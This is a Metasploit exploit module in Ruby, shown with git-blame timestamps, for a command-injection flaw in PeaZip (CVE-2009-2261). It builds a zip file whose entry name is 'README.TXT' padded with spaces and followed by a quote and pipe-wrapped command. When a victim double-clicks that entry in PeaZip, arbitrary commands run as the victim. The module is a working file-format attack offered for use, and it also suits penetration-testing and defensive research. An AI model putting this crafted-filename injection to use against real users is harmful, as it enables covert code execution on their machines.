2010-02-10 17:28:25 +00:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2010-02-10 17:28:25 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'rex/zip'
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2010-02-10 17:28:25 +00:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
|
|
|
|
|
|
|
|
def initialize(info = {})
|
2025-06-20 13:20:44 +01:00
|
|
|
super(
|
|
|
|
|
update_info(
|
|
|
|
|
info,
|
|
|
|
|
'Name' => 'PeaZip Zip Processing Command Injection',
|
|
|
|
|
'Description' => %q{
|
2010-02-10 17:28:25 +00:00
|
|
|
This module exploits a command injection vulnerability in PeaZip. All
|
2025-06-20 13:20:44 +01:00
|
|
|
versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with
|
|
|
|
|
version 2.6.1 on Windows.
|
2010-02-10 17:28:25 +00:00
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
In order for the command to be executed, an attacker must convince someone to
|
|
|
|
|
open a specially crafted zip file with PeaZip, and access the specially file via
|
|
|
|
|
double-clicking it. By doing so, an attacker can execute arbitrary commands
|
|
|
|
|
as the victim user.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' => [
|
2015-04-02 15:25:47 -05:00
|
|
|
'pyrokinesis', # Of Nine:Situations:Group
|
2010-02-10 17:28:25 +00:00
|
|
|
'jduck'
|
|
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
'References' => [
|
2010-02-10 17:28:25 +00:00
|
|
|
[ 'CVE', '2009-2261' ],
|
2016-07-15 12:00:31 -05:00
|
|
|
[ 'OSVDB', '54966' ],
|
2010-02-10 17:28:25 +00:00
|
|
|
[ 'URL', 'http://peazip.sourceforge.net/' ],
|
2012-10-23 21:02:09 +02:00
|
|
|
[ 'EDB', '8881' ]
|
2010-02-10 17:28:25 +00:00
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
'Platform' => %w{linux unix win},
|
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
|
'Payload' => {
|
|
|
|
|
'Space' => 1024,
|
2010-02-10 17:28:25 +00:00
|
|
|
'BadChars' => '',
|
|
|
|
|
'DisableNops' => true,
|
2025-06-20 13:20:44 +01:00
|
|
|
'Compat' =>
|
|
|
|
|
{
|
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
|
'RequiredCmd' => 'generic perl telnet',
|
|
|
|
|
}
|
2010-02-10 17:28:25 +00:00
|
|
|
},
|
2025-06-20 13:20:44 +01:00
|
|
|
'Targets' => [
|
|
|
|
|
['Automatic', {}],
|
2010-02-10 17:28:25 +00:00
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
'DisclosureDate' => '2009-06-05',
|
2025-06-23 12:00:29 +01:00
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
'Notes' => {
|
2025-06-23 12:43:46 +01:00
|
|
|
'Reliability' => UNKNOWN_RELIABILITY,
|
|
|
|
|
'Stability' => UNKNOWN_STABILITY,
|
|
|
|
|
'SideEffects' => UNKNOWN_SIDE_EFFECTS
|
2025-06-23 12:00:29 +01:00
|
|
|
}
|
2025-06-20 13:20:44 +01:00
|
|
|
)
|
|
|
|
|
)
|
2010-02-10 17:28:25 +00:00
|
|
|
|
|
|
|
|
register_options(
|
2010-09-20 08:06:27 +00:00
|
|
|
[
|
2010-02-10 17:28:25 +00:00
|
|
|
OptString.new('FILENAME', [ true, 'The file name.', 'msf.zip']),
|
2025-06-20 13:20:44 +01:00
|
|
|
]
|
|
|
|
|
)
|
2010-02-10 17:28:25 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def exploit
|
2010-02-11 06:00:12 +00:00
|
|
|
# NOTE: using a command line containing / or \ will result in the command
|
2010-02-10 17:28:25 +00:00
|
|
|
# being easily visible to the victim
|
|
|
|
|
cmd = datastore['CMD']
|
|
|
|
|
|
|
|
|
|
fname = "README.TXT"
|
|
|
|
|
rest = "\"|#{cmd}|.txt"
|
|
|
|
|
fname << " " * (255 - fname.length - rest.length)
|
|
|
|
|
fname << rest
|
|
|
|
|
|
|
|
|
|
content = rand_text_alphanumeric(rand(1024))
|
|
|
|
|
|
|
|
|
|
zip = Rex::Zip::Archive.new
|
|
|
|
|
zip.add_file(fname, content)
|
|
|
|
|
|
|
|
|
|
# Create the file
|
|
|
|
|
print_status("Creating '#{datastore['FILENAME']}' file...")
|
|
|
|
|
|
|
|
|
|
file_create(zip.pack)
|
|
|
|
|
end
|
|
|
|
|
end
|
